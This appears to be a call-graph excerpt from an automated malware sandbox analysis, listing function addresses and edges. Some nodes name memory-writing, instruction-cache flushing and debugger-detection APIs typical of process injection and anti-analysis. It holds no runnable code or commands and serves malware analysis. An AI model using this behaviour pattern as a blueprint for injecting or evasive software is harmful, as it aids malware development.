2cc1ee9 28542->28543 28544 2cc1ef4 28543->28544 28545 2cc1f01 28544->28545 28546 2cb89d0 4 API calls 28545->28546 28549 2cc1f26 28545->28549 28546->28545 28548 2cb89d0 4 API calls 28547->28548 28550 2cc32c7 28548->28550 28551 2cc1f52 28549->28551 28553 2cc32e8 28550->28553 28552 2cc1f7e 28551->28552 28554 2cc1f89 28552->28554 28556 2cc331f 28553->28556 28555 2cb89d0 4 API calls 28554->28555 28558 2cc1fa2 28555->28558 28557 2cb89d0 4 API calls 28556->28557 28559 2cc3343 28557->28559 28560 2cc1fce 28558->28560 28563 2cc337c 28559->28563 28561 2cc1ffa 28560->28561 28562 2cc2005 28561->28562 28564 2cb89d0 4 API calls 28562->28564 28566 2cc33b3 28563->28566 28747 2cc201e 28564->28747 28567 2cb89d0 4 API calls 28566->28567 28568 2cc33bf 28567->28568 28571 2cc33dd 28568->28571 28569 2cc2030 28570 2cc205c 28569->28570 28572 2cc2088 28570->28572 28575 2cc340a 28571->28575 28573 2cc2093 28572->28573 28574 2cb89d0 4 API calls 28573->28574 28576 2cc20ac 28574->28576 28581 2cc3437 28575->28581 28577 2cc20d8 28576->28577 28578 2cc2104 28577->28578 28579 2cc210f 28578->28579 28580 2cb89d0 4 API calls 28579->28580 28580->28747 28582 2cc34b8 28581->28582 28583 2cb89d0 4 API calls 28582->28583 28586 2cc34d1 28583->28586 28584 2cc213f 28585 2cc216b 28584->28585 28590 2cc2197 28585->28590 28588 2cc3534 28586->28588 28587 2cb89d0 4 API calls 28587->28590 28589 2cb89d0 4 API calls 28588->28589 28592 2cc354d 28589->28592 28590->28587 28591 2cc21e7 28590->28591 28597 2cc2213 28591->28597 28593 2cc3577 28592->28593 28628 2cc36eb 28592->28628 28596 2cc35a3 28593->28596 28594 2cb89d0 4 API calls 28594->28597 28595 2cc3739 28598 2cc3770 28595->28598 28599 2cc35da 28596->28599 28597->28594 28603 2cc225f 28597->28603 28600 2cb89d0 4 API calls 28598->28600 28601 2cb89d0 4 API calls 28599->28601 28602 2cc3789 28600->28602 28607 2cc35f3 28601->28607 28604 2cc37aa 28602->28604 28606 2cc22ae 28603->28606 28609 2cc37e1 28604->28609 28605 2cb89d0 4 API calls 28605->28606 28606->28605 28608 2cc22e6 28606->28608 28611 2cc3656 28607->28611 28610 2cc22f3 28608->28610 28612 2cb89d0 4 API calls 28609->28612 28614 2cc2312 28610->28614 28613 2cb89d0 4 API calls 28611->28613 28615 2cc3805 28612->28615 28619 2cc366f 28613->28619 28616 2cc232a 28614->28616 28620 2cc3859 28615->28620 28617 2cb89d0 4 API calls 28616->28617 28618 2cc2336 28617->28618 28621 2cc2356 28618->28621 28623 2cc36d2 28619->28623 28626 2cc3890 28620->28626 28622 2cc2377 28621->28622 28625 2cc2382 28622->28625 28624 2cb89d0 4 API calls 28623->28624 28624->28628 28629 2cc23ae 28625->28629 28627 2cb89d0 4 API calls 28626->28627 28630 2cc38b4 28627->28630 28628->28595 28631 2cc23b9 28629->28631 28634 2cc38ed 28630->28634 28632 2cb89d0 4 API calls 28631->28632 28633 2cc23f3 28631->28633 28632->28631 28635 2cc23fe 28633->28635 28636 2cc3924 28634->28636 28638 2cc242a 28635->28638 28637 2cb89d0 4 API calls 28636->28637 28639 2cc3930 28637->28639 28640 2cc2435 28638->28640 28642 2cc395c 28639->28642 28641 2cb89d0 4 API calls 28640->28641 28643 2cc244e 28641->28643 28644 2cc3993 28642->28644 28647 2cc249a 28643->28647 28645 2cb89d0 4 API calls 28644->28645 28646 2cc39ac 28645->28646 28650 2cc39cd 28646->28650 28648 2cc24c6 28647->28648 28649 2cc24d1 28648->28649 28652 2cc24de 28649->28652 28653 2cc3a04 28650->28653 28651 2cb89d0 4 API calls 28651->28652 28652->28651 28655 2cc2516 28652->28655 28654 2cb89d0 4 API calls 28653->28654 28663 2cc3a28 28654->28663 28656 2cc2542 28655->28656 28658 2cc254d 28656->28658 28657 2cc5530 28664 2cc555c 28657->28664 28660 2cc255a 28658->28660 28659 2cc3a3d 28659->28663 28661 2cb89d0 4 API calls 28660->28661 28662 2cc2566 28661->28662 28665 2cc259b 28662->28665 28663->28657 28663->28659 28671 2cc3aae 28663->28671 28666 2cc5593 28664->28666 28670 2cc25d2 28665->28670 28667 2cb89d0 4 API calls 28666->28667 28668 2cc55ac 28667->28668 28669 2cc55cd 28668->28669 28676 2cc5604 28669->28676 28673 2cc25ea 28670->28673 28674 2cb89d0 4 API calls 28671->28674 28672 2cb89d0 4 API calls 28672->28673 28673->28672 28675 2cc2617 28673->28675 28681 2cc3b2a 28674->28681 28677 2cc2622 28675->28677 28678 2cb89d0 4 API calls 28676->28678 28680 2cc264e 28677->28680 28679 2cc5628 28678->28679 28686 2cc5654 28679->28686 28684 2cc2666 28680->28684 28683 2cb89d0 4 API calls 28681->28683 28682 2cb89d0 4 API calls 28682->28684 28690 2cc3ba6 28683->28690 28684->28682 28685 2cc2688 28684->28685 28689 2cc269b 28685->28689 28687 2cb89d0 4 API calls 28686->28687 28688 2cc56a4 28687->28688 28695 2cc56d0 28688->28695 28692 2cc26f3 28689->28692 28691 2cb89d0 4 API calls 28690->28691 28702 2cc3c22 28691->28702 28693 2cc270b 28692->28693 28694 2cb89d0 4 API calls 28693->28694 28698 2cc2717 28694->28698 28696 2cb89d0 4 API calls 28695->28696 28697 2cc5720 28696->28697 28707 2cc5746 28697->28707 28699 2cc2750 28698->28699 28700 2cc276f 28699->28700 28701 2cc277a 28700->28701 28704 2cc2787 28701->28704 28703 2cb89d0 4 API calls 28702->28703 28713 2cc3c9e 28703->28713 28705 2cb89d0 4 API calls 28704->28705 28706 2cc2793 28705->28706 28709 2cc27c4 28706->28709 28708 2cb89d0 4 API calls 28707->28708 28716 2cc57c2 28708->28716 28710 2cc27f0 28709->28710 28711 2cc27fb 28710->28711 28714 2cc2808 28711->28714 28712 2cb89d0 4 API calls 28712->28714 28715 2cb89d0 4 API calls 28713->28715 28714->28712 28718 2cc2840 28714->28718 28720 2cc3d85 28715->28720 28717 2cb89d0 4 API calls 28716->28717 28722 2cc583e 28717->28722 28746 2cc286c 28718->28746 28719 2cc2877 28719->28747 28720->28105 28721 2cc28b5 28724 2cc290d 28721->28724 28723 2cb89d0 4 API calls 28722->28723 28729 2cc58e6 28723->28729 28725 2cc2925 28724->28725 28726 2cb89d0 4 API calls 28725->28726 28727 2cc2931 28726->28727 28728 2cc296a 28727->28728 28730 2cc2989 28728->28730 28731 2cb89d0 4 API calls 28729->28731 28732 2cc2994 28730->28732 28736 2cc5962 28731->28736 28733 2cc29a1 28732->28733 28734 2cb89d0 4 API calls 28733->28734 28735 2cc29ad 28734->28735 28738 2cc29ee 28735->28738 28737 2cb89d0 4 API calls 28736->28737 28743 2cc59de 28737->28743 28739 2cc2a06 28738->28739 28740 2cc2a25 28739->28740 28742 2cc2a30 28740->28742 28741 2cb89d0 4 API calls 28741->28742 28742->28741 28745 2cc2a6a 28742->28745 28744 2cb89d0 4 API calls 28743->28744 28749 2cc5a5a 28744->28749 28745->28746 28746->28719 28747->28362 28747->28524 28747->28569 28747->28584 28747->28721 28748 2cb89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28747->28748 29411 2cbe4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28747->29411 28748->28747 28750 2cb89d0 4 API calls 28749->28750 28751 2cc5b07 28750->28751 28752 2cb89d0 4 API calls 28751->28752 28753 2cc5b83 28752->28753 28754 2cb89d0 4 API calls 28753->28754 28755 2cc5bff 28754->28755 28756 2cb89d0 4 API calls 28755->28756 28757 2cc5c7b 28756->28757 28758 2cb89d0 4 API calls 28757->28758 28759 2cc5cf7 28758->28759 28760 2cb89d0 4 API calls 28759->28760 28761 2cc5d73 28760->28761 28762 2cc5dd3 28761->28762 29102 2cc6ff3 28761->29102 28763 2cc5df4 28762->28763 28764 2cc5dff 28763->28764 28766 2cc5e0c 28764->28766 28765 2cb89d0 4 API calls 28773 2cc75e4 28765->28773 28767 2cc5e2b 28766->28767 28768 2cc5e36 28767->28768 28769 2cc5e43 28768->28769 28770 2cb89d0 4 API calls 28769->28770 28771 2cc5e4f 28770->28771 28772 2cc5e70 28771->28772 28774 2cc5e7b 28772->28774 28775 2cb89d0 4 API calls 28773->28775 28776 2cc5e88 28774->28776 28782 2cc7660 28775->28782 28777 2cc5ea7 28776->28777 28778 2cc5eb2 28777->28778 28779 2cc5ebf 28778->28779 28780 2cb89d0 4 API calls 28779->28780 28781 2cc5ecb 28780->28781 28784 2cc5eec 28781->28784 28783 2cb89d0 4 API calls 28782->28783 28787 2cc76dc 28783->28787 28785 2cb89d0 4 API calls 28784->28785 28786 2cc5f47 28785->28786 28789 2cc5f68 28786->28789 28788 2cb89d0 4 API calls 28787->28788 28792 2cc7758 28788->28792 28790 2cc5fa0 28789->28790 28791 2cc5fd7 28790->28791 28795 2cb89d0 4 API calls 28791->28795 28793 2cb89d0 4 API calls 28792->28793 28794 2cc77d4 28793->28794 28800 2cc8318 28794->28800 28801 2cc77e9 28794->28801 28796 2cc5ffb 28795->28796 28797 2cc6034 28796->28797 28798 2cc606b 28797->28798 28799 2cb89d0 4 API calls 28798->28799 28802 2cc6077 28799->28802 28803 2cb89d0 4 API calls 28800->28803 28804 2cb89d0 4 API calls 28801->28804 28805 2cc60a3 28802->28805 28809 2cc8394 28803->28809 28808 2cc7865 28804->28808 28806 2cc60da 28805->28806 28807 2cb89d0 4 API calls 28806->28807 28812 2cc60f3 28807->28812 28811 2cb89d0 4 API calls 28808->28811 28810 2cb89d0 4 API calls 28809->28810 28816 2cc8410 28810->28816 28815 2cc78e1 28811->28815 28813 2cc6156 28812->28813 28814 2cb89d0 4 API calls 28813->28814 28820 2cc616f 28814->28820 28817 2cb89d0 4 API calls 28815->28817 28818 2cb89d0 4 API calls 28816->28818 28819 2cc795d 28817->28819 28822 2cc848c 28818->28822 29413 2cb85bc GetModuleHandleA GetProcAddress 28819->29413 28825 2cc61ec 28820->28825 28823 2cb89d0 4 API calls 28822->28823 28824 2cc8508 28823->28824 28826 2cc851d 28824->28826 28834 2cc93a1 28824->28834 28827 2cb89d0 4 API calls 28825->28827 28831 2cc853e 28826->28831 28829 2cc623c 28827->28829 28828 2cc7986 28830 2cb89d0 4 API calls 28828->28830 28832 2cc6268 28829->28832 28839 2cc7a02 28830->28839 28833 2cc8575 28831->28833 28836 2cc629f 28832->28836 28837 2cb89d0 4 API calls 28833->28837 28835 2cb89d0 4 API calls 28834->28835 28847 2cc941d 28835->28847 28838 2cb89d0 4 API calls 28836->28838 28842 2cc8599 28837->28842 28840 2cc62b8 28838->28840 28841 2cb89d0 4 API calls 28839->28841 28843 2cc62d9 28840->28843 28852 2cc7a7e 28841->28852 28844 2cc85d2 28842->28844 28845 2cc6310 28843->28845 28846 2cc8609 28844->28846 28850 2cb89d0 4 API calls 28845->28850 28848 2cb89d0 4 API calls 28846->28848 28849 2cb89d0 4 API calls 28847->28849 28851 2cc8615 28848->28851 28859 2cc9499 28849->28859 28854 2cc6334 28850->28854 28855 2cc8641 28851->28855 28853 2cb89d0 4 API calls 28852->28853 28866 2cc7afa 28853->28866 28856 2cc636d 28854->28856 28858 2cc8678 28855->28858 28857 2cc63a4 28856->28857 28862 2cb89d0 4 API calls 28857->28862 28860 2cb89d0 4 API calls 28858->28860 28861 2cb89d0 4 API calls 28859->28861 28863 2cc8691 28860->28863 28878 2cc9515 28861->28878 28864 2cc63b0 28862->28864 28865 2cc86bd 28863->28865 28867 2cc63dc 28864->28867 28869 2cc86e0 28865->28869 28868 2cb89d0 4 API calls 28866->28868 28871 2cc6413 28867->28871 28882 2cc7b9d 28868->28882 28870 2cc876e 28869->28870 28873 2cc86f2 28869->28873 28877 2cc878f 28870->28877 28872 2cb89d0 4 API calls 28871->28872 28874 2cc642c 28872->28874 28879 2cc871e 28873->28879 28881 2cc644d 28874->28881 28875 2cc9cf5 28876 2cb89d0 4 API calls 28875->28876 28891 2cc9d71 28876->28891 28885 2cc87a7 28877->28885 28878->28875 28880 2cb89d0 4 API calls 28878->28880 28883 2cc8755 28879->28883 28894 2cc95bb 28880->28894 28888 2cc6484 28881->28888 28884 2cb89d0 4 API calls 28882->28884 28887 2cb89d0 4 API calls 28883->28887 28897 2cc7c19 28884->28897 28886 2cb89d0 4 API calls 28885->28886 28889 2cc87ea 28886->28889 28887->28870 28890 2cb89d0 4 API calls 28888->28890 28899 2cc8823 28889->28899 28893 2cc64a8 28890->28893 28892 2cb89d0 4 API calls 28891->28892 28903 2cc9ded 28892->28903 29412 2cb85bc GetModuleHandleA GetProcAddress 28893->29412 28895 2cb89d0 4 API calls 28894->28895 28907 2cc9637 28895->28907 28898 2cb89d0 4 API calls 28897->28898 28911 2cc7c95 28898->28911 28901 2cb89d0 4 API calls 28899->28901 28900 2cc64e6 28904 2cc651f 28900->28904 28902 2cc8866 28901->28902 28916 2cc88b9 28902->28916 28905 2cb89d0 4 API calls 28903->28905 28906 2cc6556 28904->28906 28909 2cc9e69 28905->28909 28910 2cb89d0 4 API calls 28906->28910 28908 2cb89d0 4 API calls 28907->28908 28927 2cc96b3 28908->28927 28913 2cb89d0 4 API calls 28909->28913 28912 2cc6562 28910->28912 28914 2cb89d0 4 API calls 28911->28914 28917 2cc658e 28912->28917 28915 2cc9e9c 28913->28915 28926 2cc7d30 28914->28926 28918 2cb89d0 4 API calls 28915->28918 28919 2cb89d0 4 API calls 28916->28919 28922 2cc65c5 28917->28922 28921 2cc9ecf 28918->28921 28920 2cc8914 28919->28920 28932 2cc8935 28920->28932 28924 2cb89d0 4 API calls 28921->28924 28923 2cb89d0 4 API calls 28922->28923 28925 2cc65de 28923->28925 28928 2cc9f02 28924->28928 28930 2cc65ff 28925->28930 28929 2cb89d0 4 API calls 28926->28929 28933 2cb89d0 4 API calls 28927->28933 28931 2cb89d0 4 API calls 28928->28931 28938 2cc7dac 28929->28938 28935 2cc6636 28930->28935 28940 2cc9f35 28931->28940 28934 2cb89d0 4 API calls 28932->28934 28941 2cc978a 28933->28941 28944 2cc8990 28934->28944 28936 2cb89d0 4 API calls 28935->28936 28937 2cc665a 28936->28937 28948 2cc6686 28937->28948 28939 2cb89d0 4 API calls 28938->28939 28958 2cc7e28 28939->28958 28942 2cb89d0 4 API calls 28940->28942 28943 2cb89d0 4 API calls 28941->28943 28952 2cc9fb1 28942->28952 28954 2cc9806 28943->28954 28945 2cb89d0 4 API calls 28944->28945 28946 2cc8a0c 28945->28946 29416 2cbd164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28946->29416 28949 2cb89d0 4 API calls 28948->28949 28950 2cc66d6 28949->28950 28951 2cc66eb 28950->28951 28963 2cc6949 28950->28963 28955 2cc670c 28951->28955 28953 2cb89d0 4 API calls 28952->28953 28968 2cca02d 28953->28968 28956 2cb89d0 4 API calls 28954->28956 29034 2cc9aa9 28954->29034 28962 2cc6743 28955->28962 28972 2cc9894 28956->28972 28957 2cb89d0 4 API calls 28971 2cc9b6b 28957->28971 28960 2cb89d0 4 API calls 28958->28960 28959 2cc8a20 28961 2cb89d0 4 API calls 28959->28961 28964 2cc7ee5 28960->28964 28976 2cc8aa1 28961->28976 28967 2cb89d0 4 API calls 28962->28967 28965 2cb89d0 4 API calls 28963->28965 29414 2cb7e50 GetModuleHandleA GetProcAddress 28964->29414 28983 2cc69c5 28965->28983 28970 2cc6767 28967->28970 28969 2cb89d0 4 API calls 28968->28969 28975 2cca0a9 28969->28975 28979 2cc67a0 28970->28979 28974 2cb89d0 4 API calls 28971->28974 28973 2cb89d0 4 API calls 28972->28973 28990 2cc9910 28973->28990 28991 2cc9be7 28974->28991 28978 2cb89d0 4 API calls 28975->28978 28977 2cb89d0 4 API calls 28976->28977 28994 2cc8b1d 28977->28994 28980 2cca0dc 28978->28980 28982 2cc67d7 28979->28982 28987 2cb89d0 4 API calls 28980->28987 28981 2cc7f08 28984 2cb89d0 4 API calls 28981->28984 28985 2cb89d0 4 API calls 28982->28985 28986 2cb89d0 4 API calls 28983->28986 29003 2cc7f84 28984->29003 28988 2cc67e3 28985->28988 29004 2cc6a41 28986->29004 28989 2cca10f 28987->28989 28996 2cc680f 28988->28996 28993 2cb89d0 4 API calls 28989->28993 28995 2cb89d0 4 API calls 28990->28995 28992 2cb89d0 4 API calls 28991->28992 29011 2cc9c63 28992->29011 28999 2cca142 28993->28999 28997 2cb89d0 4 API calls 28994->28997 29017 2cc998c 28995->29017 29000 2cc6846 28996->29000 28998 2cc8b99 28997->28998 29014 2cc8bb9 28998->29014 29417 2cb8730 GetModuleHandleA GetProcAddress 28998->29417 29002 2cb89d0 4 API calls 28999->29002 29006 2cb89d0 4 API calls 29000->29006 29009 2cca175 29002->29009 29005 2cb89d0 4 API calls 29003->29005 29007 2cb89d0 4 API calls 29004->29007 29021 2cc8000 29005->29021 29008 2cc685f 29006->29008 29023 2cc6abd 29007->29023 29012 2cc6880 29008->29012 29010 2cb89d0 4 API calls 29009->29010 29027 2cca1a8 29010->29027 29013 2cb89d0 4 API calls 29011->29013 29020 2cc68b7 29012->29020 29015 2cc9cdf 29013->29015 29016 2cb89d0 4 API calls 29014->29016 29255 2cb8d70 29015->29255 29029 2cc8c35 29016->29029 29018 2cb89d0 4 API calls 29017->29018 29032 2cc9a2d 29018->29032 29022 2cc68cf 29020->29022 29024 2cb89d0 4 API calls 29021->29024 29025 2cb89d0 4 API calls 29022->29025 29026 2cb89d0 4 API calls 29023->29026 29035 2cc807c 29024->29035 29031 2cc68db 29025->29031 29036 2cc6b39 29026->29036 29028 2cb89d0 4 API calls 29027->29028 29042 2cca224 29028->29042 29030 2cb89d0 4 API calls 29029->29030 29044 2cc8cb1 29030->29044 29031->28963 29033 2cb89d0 4 API calls 29032->29033 29033->29034 29034->28957 29037 2cb89d0 4 API calls 29035->29037 29038 2cb89d0 4 API calls 29036->29038 29039 2cc80f8 29037->29039 29048 2cc6bb5 29038->29048 29415 2cbb118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 29039->29415 29041 2cc8109 29041->28105 29043 2cb89d0 4 API calls 29042->29043 29046 2cca2a0 29043->29046 29045 2cb89d0 4 API calls 29044->29045 29050 2cc8d2d 29045->29050 29047 2cb89d0 4 API calls 29046->29047 29051 2cca2d3 29047->29051 29049 2cb89d0 4 API calls 29048->29049 29054 2cc6c31 29049->29054 29052 2cb89d0 4 API calls 29050->29052 29053 2cb89d0 4 API calls 29051->29053 29056 2cc8db4 29052->29056 29057 2cca34f 29053->29057 29055 2cb89d0 4 API calls 29054->29055 29060 2cc6cad 29055->29060 29058 2cb89d0 4 API calls 29056->29058 29059 2cb89d0 4 API calls 29057->29059 29062 2cc8e30 29058->29062 29063 2cca3cb 29059->29063 29061 2cb89d0 4 API calls 29060->29061 29073 2cc6d48 29061->29073 29064 2cb89d0 4 API calls 29062->29064 29065 2cb89d0 4 API calls 29063->29065 29070 2cc8eac 29064->29070 29066 2cca447 29065->29066 29067 2cb89d0 4 API calls 29066->29067 29068 2cca47a 29067->29068 29069 2cb89d0 4 API calls 29068->29069 29072 2cca4ad 29069->29072 29071 2cb89d0 4 API calls 29070->29071 29078 2cc8f33 29071->29078 29074 2cb89d0 4 API calls 29072->29074 29075 2cb89d0 4 API calls 29073->29075 29076 2cca4e0 29074->29076 29080 2cc6e43 29075->29080 29077 2cb89d0 4 API calls 29076->29077 29082 2cca513 29077->29082 29079 2cb89d0 4 API calls 29078->29079 29084 2cc8faf 29079->29084 29081 2cb89d0 4 API calls 29080->29081 29088 2cc6ebf 29081->29088 29083 2cb89d0 4 API calls 29082->29083 29086 2cca58f 29083->29086 29085 2cb89d0 4 API calls 29084->29085 29091 2cc902b 29085->29091 29087 2cb89d0 4 API calls 29086->29087 29090 2cca60b 29087->29090 29089 2cb89d0 4 API calls 29088->29089 29096 2cc6f77 29089->29096 29092 2cb89d0 4 API calls 29090->29092 29093 2cb89d0 4 API calls 29091->29093 29094 2cca63e 29092->29094 29100 2cc90a7 29093->29100 29095 2cb89d0 4 API calls 29094->29095 29097 2cca671 29095->29097 29098 2cb89d0 4 API calls 29096->29098 29099 2cb89d0 4 API calls 29097->29099 29098->29102 29103 2cca6a4 29099->29103 29101 2cb89d0 4 API calls 29100->29101 29107 2cc9123 29101->29107 29102->28105 29102->28765 29104 2cb89d0 4 API calls 29103->29104 29105 2cca6d7 29104->29105 29106 2cb89d0 4 API calls 29105->29106 29109 2cca70a 29106->29109 29108 2cb89d0 4 API calls 29107->29108 29111 2cc919f 29108->29111 29110 2cb89d0 4 API calls 29109->29110 29120 2cca786 29110->29120 29112 2cb89d0 4 API calls 29111->29112 29113 2cc921b 29112->29113 29418 2cb894c 29113->29418 29115 2cc923a 29116 2cb894c 3 API calls 29115->29116 29117 2cc924e 29116->29117 29118 2cb894c 3 API calls 29117->29118 29119 2cc9262 29118->29119 29121 2cb894c 3 API calls 29119->29121 29122 2cb89d0 4 API calls 29120->29122 29123 2cc9276 29121->29123 29127 2cca802 29122->29127 29124 2cb894c 3 API calls 29123->29124 29125 2cc928a 29124->29125 29126 2cb894c 3 API calls 29125->29126 29129 2cc929e 29126->29129 29128 2cb89d0 4 API calls 29127->29128 29131 2cca87e 29128->29131 29130 2cb89d0 4 API calls 29129->29130 29133 2cc9325 29130->29133 29132 2cb89d0 4 API calls 29131->29132 29135 2cca8fa 29132->29135 29134 2cb89d0 4 API calls 29133->29134 29134->28834 29136 2cb89d0 4 API calls 29135->29136 29137 2cca976 29136->29137 29138 2cb89d0 4 API calls 29137->29138 29139 2cca985 29138->29139 29140 2cb89d0 4 API calls 29139->29140 29141 2cca994 29140->29141 29142 2cb89d0 4 API calls 29141->29142 29143 2cca9a3 29142->29143 29144 2cb89d0 4 API calls 29143->29144 29145 2cca9b2 29144->29145 29146 2cb89d0 4 API calls 29145->29146 29147 2cca9c1 29146->29147 29148 2cb89d0 4 API calls 29147->29148 29149 2cca9d0 29148->29149 29150 2cb89d0 4 API calls 29149->29150 29151 2cca9df 29150->29151 29152 2cb89d0 4 API calls 29151->29152 29153 2cca9ee 29152->29153 29154 2cb89d0 4 API calls 29153->29154 29155 2cca9fd 29154->29155 29156 2cb89d0 4 API calls 29155->29156 29157 2ccaa0c 29156->29157 29158 2cb89d0 4 API calls 29157->29158 29159 2ccaa1b 29158->29159 29160 2cb89d0 4 API calls 29159->29160 29161 2ccaa2a 29160->29161 29162 2cb89d0 4 API calls 29161->29162 29163 2ccaa39 29162->29163 29164 2cb89d0 4 API calls 29163->29164 29165 2ccaa48 29164->29165 29166 2cb89d0 4 API calls 29165->29166 29167 2ccaa57 29166->29167 29168 2cb89d0 4 API calls 29167->29168 29169 2ccaad3 29168->29169 29170 2cb89d0 4 API calls 29169->29170 29171 2ccab06 29170->29171 29172 2cb89d0 4 API calls 29171->29172 29173 2ccab39 29172->29173 29174 2cb89d0 4 API calls 29173->29174 29175 2ccab6c 29174->29175 29176 2cb89d0 4 API calls 29175->29176 29177 2ccab9f 29176->29177 29178 2cb89d0 4 API calls 29177->29178 29179 2ccabd2 29178->29179 29180 2cb89d0 4 API calls 29179->29180 29181 2ccac05 29180->29181 29182 2cb89d0 4 API calls 29181->29182 29183 2ccac38 29182->29183 29184 2cb89d0 4 API calls 29183->29184 29185 2ccacb4 29184->29185 29186 2cb89d0 4 API calls 29185->29186 29187 2ccad30 29186->29187 29188 2cb89d0 4 API calls 29187->29188 29189 2ccadac 29188->29189 29190 2cb89d0 4 API calls 29189->29190 29191 2ccaddf 29190->29191 29192 2cb89d0 4 API calls 29191->29192 29193 2ccae12 29192->29193 29194 2cb89d0 4 API calls 29193->29194 29195 2ccae45 29194->29195 29196 2cb89d0 4 API calls 29195->29196 29197 2ccae78 29196->29197 29198 2cb89d0 4 API calls 29197->29198 29199 2ccaeab 29198->29199 29200 2cb89d0 4 API calls 29199->29200 29201 2ccaede 29200->29201 29202 2cb89d0 4 API calls 29201->29202 29203 2ccaf11 29202->29203 29204 2cb89d0 4 API calls 29203->29204 29205 2ccaf44 29204->29205 29206 2cb89d0 4 API calls 29205->29206 29207 2ccaf77 29206->29207 29208 2cb89d0 4 API calls 29207->29208 29209 2ccafaa 29208->29209 29210 2cb89d0 4 API calls 29209->29210 29211 2ccafdd 29210->29211 29212 2cb89d0 4 API calls 29211->29212 29213 2ccb010 29212->29213 29214 2cb89d0 4 API calls 29213->29214 29215 2ccb043 29214->29215 29216 2cb89d0 4 API calls 29215->29216 29217 2ccb076 29216->29217 29218 2cb89d0 4 API calls 29217->29218 29219 2ccb0a9 29218->29219 29220 2cb89d0 4 API calls 29219->29220 29221 2ccb0dc 29220->29221 29222 2cb89d0 4 API calls 29221->29222 29223 2ccb10f 29222->29223 29224 2cb89d0 4 API calls 29223->29224 29225 2ccb142 29224->29225 29226 2cb89d0 4 API calls 29225->29226 29227 2ccb175 29226->29227 29422 2cb8338 29227->29422 29229 2ccb184 29230 2cb89d0 4 API calls 29229->29230 29231 2ccb200 29230->29231 29232 2cb89d0 4 API calls 29231->29232 29233 2ccb27c 29232->29233 29234 2cb89d0 4 API calls 29233->29234 29234->28137 29236 2cb88c6 29235->29236 29429 2cb8274 29236->29429 29238 2cb88f1 29433 2cb7d78 29238->29433 29240 2cb891f 29240->28109 29242 2cb89e4 29241->29242 29243 2cb81cc 2 API calls 29242->29243 29244 2cb8a1d 29243->29244 29245 2cb8274 GetProcAddress 29244->29245 29246 2cb8a36 29245->29246 29247 2cb7d78 3 API calls 29246->29247 29248 2cb8a95 29247->29248 29249 2cb8338 3 API calls 29248->29249 29250 2cb8aa4 29249->29250 29250->28114 29252 2cbf759 29251->29252 29253 2cbf786 29252->29253 29254 2cbf774 CheckRemoteDebuggerPresent 29252->29254 29253->28140 29254->29253 29256 2cb8d78 29255->29256 29257 2cb89d0 4 API calls 29256->29257 29258 2cb8dfb 29257->29258 29259 2cb89d0 4 API calls 29258->29259 29260 2cb8e54 29259->29260 29261 2cba8b7 29260->29261 29262 2cb89d0 4 API calls 29260->29262 29261->28875 29263 2cb8ec5 29262->29263 29264 2cb89d0 4 API calls 29263->29264 29265 2cb8f1e 29264->29265 29265->29261 29266 2cb89d0 4 API calls 29265->29266 29267 2cb8fa6 29266->29267 29268 2cb89d0 4 API calls 29267->29268 29269 2cb8fff 29268->29269 29270 2cb89d0 4 API calls 29269->29270 29271 2cb9084 29270->29271 29272 2cb89d0 4 API calls 29271->29272 29273 2cb90e3 29272->29273 29274 2cb89d0 4 API calls 29273->29274 29275 2cb9154 29274->29275 29276 2cb89d0 4 API calls 29275->29276 29277 2cb91c5 29276->29277 29278 2cb89d0 4 API calls 29277->29278 29279 2cb9236 29278->29279 29445 2cb8788 29279->29445 29281 2cb9273 29282 2cb92e8 29281->29282 29284 2cb89d0 4 API calls 29281->29284 29283 2cb89d0 4 API calls 29282->29283 29285 2cb9359 29283->29285 29284->29282 29286 2cb89d0 4 API calls 29285->29286 29287 2cb938c 29286->29287 29288 2cb89d0 4 API calls 29287->29288 29289 2cb93fd 29288->29289 29290 2cb89d0 4 API calls 29289->29290 29291 2cb946e 29290->29291 29292 2cb89d0 4 API calls 29291->29292 29293 2cb950b 29292->29293 29294 2cb89d0 4 API calls 29293->29294 29295 2cb957c 29294->29295 29296 2cb89d0 4 API calls 29295->29296 29297 2cb95ed 29296->29297 29297->29261 29298 2cb89d0 4 API calls 29297->29298 29299 2cb9680 29298->29299 29300 2cb89d0 4 API calls 29299->29300 29301 2cb96f1 29300->29301 29302 2cb89d0 4 API calls 29301->29302 29303 2cb9762 29302->29303 29304 2cb89d0 4 API calls 29303->29304 29305 2cb97d3 29304->29305 29306 2cb89d0 4 API calls 29305->29306 29307 2cb9844 29306->29307 29452 2cb8400 29307->29452 29309 2cb9864 29310 2cb9b7f 29309->29310 29311 2cb9878 29309->29311 29312 2cb89d0 4 API calls 29310->29312 29314 2cb9b78 29310->29314 29313 2cb89d0 4 API calls 29311->29313 29312->29314 29315 2cb98e9 29313->29315 29316 2cb89d0 4 API calls 29314->29316 29317 2cb89d0 4 API calls 29315->29317 29318 2cb9c61 29316->29318 29319 2cb995a 29317->29319 29320 2cb89d0 4 API calls 29318->29320 29321 2cb89d0 4 API calls 29319->29321 29327 2cb9cd2 29320->29327 29322 2cb99cb 29321->29322 29459 2cb8670 29322->29459 29324 2cb99df 29325 2cb99e3 29324->29325 29331 2cb9a0b 29324->29331 29466 2cb7a2c 29325->29466 29328 2cb89d0 4 API calls 29327->29328 29329 2cb9d43 29328->29329 29330 2cb7a2c 3 API calls 29329->29330 29335 2cb9d64 29330->29335 29332 2cb89d0 4 API calls 29331->29332 29333 2cb9a04 29331->29333 29332->29333 29334 2cb89d0 4 API calls 29333->29334 29337 2cb9aed 29334->29337 29335->29261 29336 2cb89d0 4 API calls 29335->29336 29341 2cb9de7 29336->29341 29338 2cb89d0 4 API calls 29337->29338 29339 2cb9b5e 29338->29339 29340 2cb7a2c 3 API calls 29339->29340 29340->29314 29342 2cb89d0 4 API calls 29341->29342 29343 2cb9e58 29342->29343 29344 2cb89d0 4 API calls 29343->29344 29345 2cb9f34 29344->29345 29346 2cb89d0 4 API calls 29345->29346 29347 2cb9fa5 29346->29347 29348 2cb89d0 4 API calls 29347->29348 29349 2cba016 29348->29349 29350 2cb7d78 3 API calls 29349->29350 29351 2cba033 29350->29351 29352 2cb89d0 4 API calls 29351->29352 29353 2cba0a4 29352->29353 29354 2cb89d0 4 API calls 29353->29354 29355 2cba115 29354->29355 29356 2cb89d0 4 API calls 29355->29356 29357 2cba186 29356->29357 29358 2cb7d78 3 API calls 29357->29358 29359 